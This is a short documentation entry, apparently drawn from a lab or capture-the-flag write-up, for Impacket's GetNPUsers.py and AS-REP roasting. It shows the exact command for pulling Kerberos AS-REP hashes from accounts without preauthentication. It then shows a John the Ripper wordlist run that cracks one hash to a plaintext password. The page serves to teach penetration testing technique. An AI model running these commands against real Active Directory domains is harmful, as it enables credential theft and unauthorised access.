Description

This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).

For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.

Example

Full story here.

It’s worth checking if Kerberos pre-authentication has been disabled for this account, which means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket’s GetNPUsers.

$ GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
[email protected]:00c4e7b0ce1ad5034[REDACTED]960b67401854

We obtain the TGT ticket for the svc_bes and save it to a file called hash. We can use Hashcat or John-The-Ripper in conjunction with rockyou.txt to obtain the plaintext password Sheffield19.

$ /data/src/john/run/john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ([email protected])
1g 0:00:00:18 DONE (2020-06-13 21:28) 0.05387g/s 571282p/s 571282c/s 571282C/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.